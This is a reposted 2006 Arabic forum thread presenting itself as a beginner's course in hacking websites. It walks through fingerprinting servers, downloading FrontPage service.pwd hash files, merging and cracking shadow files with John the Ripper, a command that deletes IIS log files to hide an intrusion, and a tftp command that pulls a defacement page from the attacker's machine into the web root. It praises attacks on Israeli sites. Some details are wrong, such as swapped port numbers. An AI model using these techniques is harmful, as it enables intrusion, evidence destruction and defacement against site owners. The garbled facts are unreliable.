منتدى ديسك توب

كل ما هو مهم ومفيد على شبكة الانترنت نرجو تجدو ما يسركم دائما (منتديات ديسك توب )

السلام عليكم ورحمة الله وبركاتة - سبحان الله والحمد لله والله اكبر المهندس للكمبيوتر للاتصال 01200137513-01142488366 مدير المنتدى عبدالله الشرقاوى

اساس الاختراق منقول

شاطر

بيدو نت
Admin
Admin

ذكر
عدد الرسائل : 435
العمر : 38
البلد : مدينة السويس
العمر : 31
المهنة : ITمكتب خدمات الكمبيوتر
السٌّمعَة : 0
نقاط : 37615
تاريخ التسجيل : 29/08/2006

اساس الاختراق منقول

مُساهمة من طرف بيدو نت في الإثنين سبتمبر 11, 2006 1:15 am

1- (اساسيات وتعاريف) farao
تلنت:
1(Telnet) -

و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال
بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز
غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر
عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى
Start ==> Run ==> telnet
و ستظهر شاشة التلنت.

برامج السكان: (Scanner) - 2
و هي برامج موجودة للمسح على المواقع و كشف ثغراتها إن وجدت ، فهي سريعة كما
أنها تملك قاعدة بيانات واسعة و كبيرة تحتوي على الثغرات أو الاكسبلويت التي
يتم تطبيقها على الموقع لرؤية فيما اذا كان السيرفر يعاني من احدى هذه
الثغرات أم لا . و من أمثلة،
Shadow Security Scanner و Stealth و Omran Fast
هذه البرامج، برنامج
Scanner
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ
IIS
على ثغرات السي جي اي فقط و منها برامج المسح
CGI


study

بيدو نت
Admin
Admin

ذكر
عدد الرسائل : 435
العمر : 38
البلد : مدينة السويس
العمر : 31
المهنة : ITمكتب خدمات الكمبيوتر
السٌّمعَة : 0
نقاط : 37615
تاريخ التسجيل : 29/08/2006

تابع

مُساهمة من طرف بيدو نت في الإثنين سبتمبر 11, 2006 1:16 am

اكسبلويت: (Exploits) - 3
هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL
، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ
Buffer Over Flow Exploits
هناك أنواع من الإكسبلويت ، فمنها ال
CGI Exploits
CGI Bugs
Unicodes Exploits
Buffer Over Flow Exploits
PHP Exploits
DOS Exploits
والتي تقوم بعملية حجب الخدمة للسيرفر إن وجد فيها الثغرة المطلوبة لهذا
الهجوم و ان لم يكن على السيرفر أي فايرول
Fire Wall
.وهناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c)
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتوب بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler
و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.


للاعلى



الجدار الناري: (Firewall) - 4
هي برامج تستعملها السيرفرات لحمايتها من الولوج الغير شرعي لنظام ملفاتها من
قبل المتطفلين هي تمثل الحماية للسيرفر طبعا ولكني أنوه بأن الفايروات
المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية
الأجهزة.


للاعلى



هو ملف الباسورد المظلل: (Token) - 5
(Shadowed Passwd)
والذي يكون فيه الباسورد على شكل
*
او
x
البحث عن ملف الباسورد الغير المظلل و الذي يسمى إن وجدت ملف الباسورد مظللا
، فيجب
Shadow file
تجده في
/etc/shadow


للاعلى



Anonymous - 6
هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه.


للاعلى



Vulnerabilities - 7
أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟
Valnerable
أي ثغرة أو بالأصح موضع الضعف والمكان الغير مؤمن بشكل سليم . و تكثر هذه
الكلمة في القوائم البريدية للمواقع المهتمة بالسيكيوريتي و أمن الشبكات و
غيرها كالقائمة البريدية الموجودة في موقع
Security Focus
أو بوق تراك او غيرها.


للاعلى



: ملف الباسوورد(passwd file) - 8
هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.


للاعلى



الجذر: (root) - 9
و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .


للاعلى



السيرفر: (Server) - 10
هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه فهو جهاز
كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون
المواقع شغالة 24 على الإنترنت .
قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي
اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي

تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها
أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد .( جزاكم الله خيرا أيها المجاهدون)

Basketball

بيدو نت
Admin
Admin

ذكر
عدد الرسائل : 435
العمر : 38
البلد : مدينة السويس
العمر : 31
المهنة : ITمكتب خدمات الكمبيوتر
السٌّمعَة : 0
نقاط : 37615
تاريخ التسجيل : 29/08/2006

وتابع

مُساهمة من طرف بيدو نت في الإثنين سبتمبر 11, 2006 1:18 am

للاعلى



بوفر أوفر فلو: ( Buffer over Flow ) - 11
وهي نوع من أنواع الاكسبلويتات التي تستعمل لشن هجوم الطفح على نقطة معينة من
السيرفر مثل الهجوم على بورت الإف تي بي أو غيره لأجل اضعاف اتصال السيرفر و
فصل اتصاله بهذا البورت و لالغاء الرقعة الموجودة بها كي يتم استغلالها مجددا
- بعد عمل الكراش لها طبعا - يتم استغلالها في معاودة الإتصال لها و بسهولة و
دون وجود أي رقع او حواجز و سحب البيانات منها . و هي شبيهة نوعا ما بعملية
حجب الخدمة اذ أنها تقوم بعملية اوفر لود على جزء مركز من السيرفر .


للاعلى



- 12 BOX
كثير من الهكرز يحبون ان يطلقوا على كل من ال
pc , servers , supercomputers
هذه الكلمة - BOX



للاعلى


super user
13- النظام المراد اختراقه يحتوي عاده على العديد من اليوزرز ..بالاضافه
لليوزرز
تسطيع ان تطلق على المدير هناك كلمه
super user
وهو يكون روت
وهو الادمين او المدير على النظام....


للاعلى



14- ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خلالها التحكم في جهاز
من بعيد و هذا الجهاز عليه نظام اليونيكس.


للاعلى



15- بعد اختراق موقع يتم مسح الخطوات ؟
/c+del+c:/winnt/system32/logfiles/*.log
نكتب هذا الامر بالدوس
او نروح السي وبعدين فايل ويندوز بعدين فايل
system32
بعدين
امسح ملف اسمة
*
وامتدادة
log


للاعلى



16- لتغيير صفحة البداية ؟
يتم تغير الصفحه الرئيسه عندما يتم الحصول على الباسورد الخاص بالموقع ثم
الدخول عليه ثم ملف يدعى
index
افتحوا او الغيه و استبدله ب ملف بنفس الاسم باستخدام برنامج
WS_FTP PRO
مع الاخذ بعين الاعتبار ضرورة تعلم طريقة عمل لوحة التحكم او مايسمى كنترول
بانل والوقوف على اسلوب السيطرة على كيفية تحميل وتبديل صفحات الموقع والذي
تجده في برنامجنا الكاتب سوفت

للاعلى



17- ( برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها )
هذه من أفضل برامج البحث عن الثغرات :
============================================
اضغط وحمله
1 - N-Stealth
شرح استخدام البرنامج

أداة رائعة وقوية وتتميز باكتشاف نظام الموقع وثغراته
**************************************************

2- Shadow Security Scanner معرب
شرح استخدام البرنامج
برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات
**************************************************

3- Omran Scanner
برنامج عربي من لاكتشاف الثغرات ويحتوي على ملفات للبحث مثل
Linux-Unix-NT
**************************************************

4- CGI Scanner
مختص في البحث عن ثغرات
cgi
وهو الأفضل في عمل ذلك


للاعلى


ثانيا :
الملقمات اشهرها اثنين:
IIS:
من مايكروسوفت وهي مليئة ثغرات. ( ومواقع قليل مقفلة ثغراتها ).
apache:
من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.



--------------------------------------------------------------------------------


19- اول خطوة في الاختراق هي المعلومات: هو معرفة امكانيات ونظام التشغيل
ومواصفات الملقم العامل والخدمات اللي يدعمها.
يمكنك الحصول على هذه المعلومات من الموقع
http://www.netcraft.net/
ملاحظة: نكتب الموقع من غير
http://
وبدون
/
اللي بالاخير
او نستخدم التلنت.
1 - مثال على ملقمات اي اي اس:
راح يطلع لنا التالي
The site http://www.xxxxx.org/ is running Microsoft-IIS/5.0 on Windows
2000
حصلنا على التالي
اول شيء انه شغال على الملقم
IIS5.0
ثاني شيء شغال على نظام ويندوز 2000

هناك مسالة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح ولا تعمل إلا مع
ملقمات
IIS
وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع.
لنفترض انه بدون ثغرات؟
نبحث في محتويات الموقع نفسه
هل لديه سجل زوار او منتدى او ....
2 - مثال على ملقمات اباتشي:
ناخذ مثال موقع xxxx
http://www.xxxxx.com/
لو حللناه بالنيت كرافت راح نشوف النتيجة التالية:
The site http://www.xxxxx.com/ is running Apache/1.3.20 (Unix)
mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on
Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج وهذه مليئة ثغرات
FrontPage/5.0.2.2510
3- النظام وهو
Linux



--------------------------------------------------------------------------------


الملقم:
في البداية اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منه



--------------------------------------------------------------------------------


دعم الفرونت بيج كما ذكر الفرونت بيج مليء ثغرات وثغراته قوية وكثيرة تقريبا
منها مجلد
_vti_pvt
و
_private
هي التي نحتاجها داخل المجلدين سوف نشاهد اربع ملفات مهمة وهي
service.pwd
و
users.pwd
و
authors.pwd
و
adminstators.pwd
ويعتبر هذا اخطر ملف طيب لو استطعنا تحميل واحد من الملفات هذه (ملاحظة
الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها
بالمفكرة وسنجد السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM
وهذا من موقع xxxx
http://www.xxxxx.com.sa/_vti_pvt/service.pwd
الآن
goodyco
اليوزر والباسورد مشفر واللي هو
CalXS8USl4TGM
و وكيف ينفك؟
ينفك ببرنامج اسمه
john the repaier
( شرح الاستخدام )



--------------------------------------------------------------------------------


طيب نعود للفقرة الثالثة واللي هي النظام كما شاهدنا النظام هو لينكس لكن اي
لينكس ؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح
تواجهك مشكلتين
اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال
telnet
واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم
يكون عندك لينكس اصلا علشان ثغراته بلغة ال
c
وهذه لا تعمل إلا عاللينكس فقط.



--------------------------------------------------------------------------------


20- (مواقع تعطيك ثغرات الانظمة والويندوز والمنتديات وووو....)
http://www.ussrback.com/
الموقع هذا خطير جداً جداً تروح ل
EXPLOITS
اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و
و و الخ.. ومنوعة من
c
و
perl
و يوني كود.



--------------------------------------------------------------------------------


http://neworder.box.sk/
هذا الموقع مفيد جدا تكتب مثلا فوق بالمربع اللي عاليمين
IIS او apache
او منتدى واصدارته او اي برنامج ويعطيك ثغراته.



--------------------------------------------------------------------------------


أرشيف لثغرات
www.securiteam.com/exploits/archive.html
أرشيف لثغرات
http://www.ussrback.com/
أرشيف لثغرات
http://www.secureroot.com/
أرشيف لثغرات
http://www.rootshell.com/
أرشيف لثغرات
http://www.ussrback.com/
مواقع لثغرات
www.secureroot.com/category/exploits



--------------------------------------------------------------------------------


20- هناك انظمة وملقمات كثيرة منها:
Apache (الملقم)
IIS(الملقم)
SunOS(الملقم)
FreeBSD (My BaBe)(الملقم)
OpenBSD(الملقم)
NetBSD(الملقم)
AIX(الملقم)
IRIX(الملقم)
NetScape(الملقم)
Enterprise(الملقم)
Windows/NT/2000/xp (نظام التشغيل)
Linux(نظام الشتغيل )


farao لسة فى باقة
يعنى

بيدو نت
Admin
Admin

ذكر
عدد الرسائل : 435
العمر : 38
البلد : مدينة السويس
العمر : 31
المهنة : ITمكتب خدمات الكمبيوتر
السٌّمعَة : 0
نقاط : 37615
تاريخ التسجيل : 29/08/2006

اخر مرة عشان البية

مُساهمة من طرف بيدو نت في الإثنين سبتمبر 11, 2006 1:19 am

--------------------------------------------------------------------------------


21-
اليونكس له ست مجلدات

bin خاص بالملفات الثنائيه يعني اللي تشغل النظام
etc ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd

dev ملفات الاجهزه
lib مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل
tmp الملفات الموقته او غير الثابته
usr اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام



--------------------------------------------------------------------------------


22- (اوامر الاف تي بي)
Pwd
لكي تعرف ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب حق جهازك
مثال
Get black.exe
Put
العملية العكسية ل
Get
يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
يمكنك تشغيل الاف تي بي من الويندوز عن طريق :
START > RUN > ftp -n hostname



--------------------------------------------------------------------------------


23- بورتات برامج:-
7 echo
21 telnet
23 ftp
25 smtp
80 http
110 POP



--------------------------------------------------------------------------------


c - 24
هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي ولكن
المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك
Linux او Shell Account



--------------------------------------------------------------------------------


25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404
Error
وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير
مضرة أو خطير لكنها تفيد في عملية الاختراق.



--------------------------------------------------------------------------------


26 -( كيف تحصل على شيل اكاونت مجانا )
و تنقسم الشيل اكونتس الي نوعين:
1-restricted
2-non-restricted
و الفرق بينهما ان
restricted
مدفوع القيمه و يمكنك من تنفيذ اي
command
اما ال
non restricted
فهو مجاني
و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت
مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل
http://www.cyberarmy.com/
او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد الشيل
اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و اليونكس فيما
بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس مختلفه و تتميز
فيما بينها
بالتالي:
1-telnet
2-nslookup و الذي يعطيك معلومات عن المضيف
3-ftp
4-finger
4-trace route
5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه
6-netstat
7-gcc و هذا كمبيلير للغه البرمجه c
8-gzip لفك ضغط الملفات
9-lynx متصفح للانترنت





- 27تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج
.TFTP
-=-=-=-=-=-=-=-=-=-=-=-=-
قم بانشاء صفحة وضع شعارك عليها واحفظها باسم
index.htm
على الـ
c:\\\\
قم بتشغيل برنامج
TFTP
:ونفذ الامر في الفقرة التالية



/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\\\\inetpub\\\\wwwroot\\\\index. htm
tftp.exe



وهو البرنامج اللازم لعمل الاب لود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i"
وهو بمثابة باراميترز لقراءة البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET
وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm
اسم الملف بجهازك
\\\\inetpub\\\\wwwroot\\\\
اسم الدليل في السيرفر
index.htm
اسم الملف على السيرفر



- 28تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل
http://www.sitename.com:2082/
أو
www.sitename.com/cpanel
هذا في حال كان الموقع يستخدم الـ
CPanel
وهو البرنامج الأكثر شيوعاً ..
ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر ..
وتصير في الداخل.

Sad

يعنى يعنى يعنى

بيدو نت
Admin
Admin

ذكر
عدد الرسائل : 435
العمر : 38
البلد : مدينة السويس
العمر : 31
المهنة : ITمكتب خدمات الكمبيوتر
السٌّمعَة : 0
نقاط : 37615
تاريخ التسجيل : 29/08/2006

اخر درس فى اساسات الاختراق منقول

مُساهمة من طرف بيدو نت في الإثنين سبتمبر 11, 2006 1:22 am

Sad

29- اماكن تواجد ملف باسوورد المواقع:
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd



Laughing
30- كيف اتاكد ان الثغرة شغالة ؟
- جرب اللثغرة بواسطة الـ
URL او الـ URI .
Arrow
31- كيف تسد ثغرات اي اي اس اذا كانت شغالة في موقعك؟
(IIS4.0 on WinNT)
http://www.microsoft.com/ntserver/nt...62/default.asp
(IIS5.0 on Win2000)
www.microsoft.com/windows200...862/default.asp

32 - ما الفرق بين ملف الباسورد المشفر
encryption
والمضلل
shadowed?

الملف المضلل
shadow file
يكون مكان كلمة المرور رمز مثل
*
أو
x
أو
#
أو
!
وهذا مثال لها
root:x:0:1:Super-User:/:/sbin/sh
لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
هنا تكون كلمة المرور المشفره هي: Q71KBZlvYSnVw

dragonxp
عرض الملف الشخصي العام
زيارة الرئيسية للمستخدم dragonxp!
البحث عن المزيد من المشاركات بواسطة dragonxp
إضافة dragonxp إلى قائمة الأصدقاء

11-27-2004, 09:44 AM #2
dragonxp
ليزر جديد



ح 2

33 و ماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟

يتم كسر كلمة السر المشفرة ببرنامج جون ذا ريبر الذي ساضع طريقة عملة
بالتفصيل في اخر الدرس وهذا البرنامج يقوم بتجربة 5000 كلمة بالثانية(سرعة
جنونية) مما يجعله الاسرع في فك التشفير.

ثالثا :
34 -اذا كان ملف
passwd
مضلل ماذا تفعل؟
الان جميع ملفات
passwd
تكون مضللة ولكن توجد طريقة لفكها
اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو
shadow
ماهي اماكن تواجد ملف
shadow
في الأنظمة؟
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ،
اليك الجدول التالي:
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *

jocolor token
تعني الرمز الذي يوجد في الملف
passwd
وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا
يعني ان كلمة المرور مسجله في
/etc/security/passwd
، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو ( ملف شادو هو الملف
الذي تخزن فيه كلمة المرور الصحيحه).
ملف الشادوا تكون الكلام الذي فيه مشفر
الخظوة الأخيرة وهي دمج ملف
shadow & passwd
انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا
رايبر وصلة البرنامج

انتبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر
لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج
الامر هو
unshadow passwd.txt shadow.txt
اذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء
عند الدمج فقط قم بتبديل علامة
x
التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق
العملية في كل علامة x
تكون في ملف الباس
35- فك تشفير ملف
shadow
asswd بعد دمجه مع ملف
x وهو طريقة فك تشفير ملف
passwd
الدليل الكامل لكسر كلمات السر
برنامج
John the Ripper
لكسر كلمات السر
farao
36 - برنامج
(John the Ripper)
احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة
(nix*)
وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف
(PASSWD)
بان يكون مضلل وعلى المخترق الحصول على ملف
(SHADOW)
لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي
الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك
المفتاح .

37 - كيف استغلال الباسورد:
يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد
او انك تدخل من الاف تي بي وهو الأسهل والمنتشر
كيفية الدخول ب
ftp
يمكنك استخدام احد برامج ال
ftp
منها
ws_ftp
او
CuteFTP 4.2.5 Build 10.4.1

وهو موجود في برنامجنا هكرز فول
scratch اكيد طبعا

    الوقت/التاريخ الآن هو الإثنين ديسمبر 05, 2016 5:31 pm